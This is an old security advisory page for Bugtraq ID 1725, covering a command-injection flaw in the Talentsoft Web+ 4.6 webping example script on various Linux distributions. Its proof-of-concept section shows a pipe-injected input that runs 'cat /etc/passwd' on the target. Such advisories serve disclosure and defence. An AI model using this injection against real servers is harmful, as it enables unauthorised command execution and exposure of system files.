Talentsoft Web+ Example Script File Disclosure Vulnerability

BID:1725

Info

Talentsoft Web+ Example Script File Disclosure Vulnerability

Bugtraq ID: 1725
Class: Input Validation Error
CVE:
Remote: Yes
Local: Yes
Published: Sep 26 2000 12:00AM
Updated: Sep 26 2000 12:00AM
Credit: This vulnerability was reported to bugtraq by Delphis Consulting Internet Security Team (DCIST) in an advisory (DST2K0042) dated 26/09/2000.
Vulnerable: TalentSoft Web+ Application Server (Linux) 4.6
- Caldera OpenLinux 2.4
- Caldera OpenLinux 2.3
- Caldera OpenLinux 2.2
- Caldera OpenLinux 1.3
- Caldera OpenLinux 1.2
- Caldera OpenLinux 1.1
- Caldera OpenLinux 1.0
- Corel Linux OS 1.0
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- Mandriva Linux Mandrake 6.1
- Mandriva Linux Mandrake 6.0
- Redhat Linux 6.0
- Slackware Linux 7.1
- Slackware Linux 7.0
- SuSE Linux 6.0
- Turbolinux Turbolinux 6.0
Not Vulnerable:

Exploit / POC

Talentsoft Web+ Example Script File Disclosure Vulnerability

Excerpted from the Delphis Security TeamCIST advisory (DST2K0042):

To exploit simply place a '|' after the parameter you which to provide to
ping and then the command you wish to execute.

e.g:
Goto:
http://target/cgi-bin/webplus.cgi?Script=/webplus/webping/webping.wml

Then type in host destination box:
127.0.0.1 | cat /etc/passwd

You will then be presented with the contents of the /etc/passwd file.

References

Talentsoft Web+ Example Script File Disclosure Vulnerability

References:
© CVE.report 2026 |

Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.

CVE, CWE, and OVAL are registred trademarks of The MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. This site includes MITRE data granted under the following license.

Free CVE JSON API cve.report/api

CVE.report and Source URL Uptime Status status.cve.report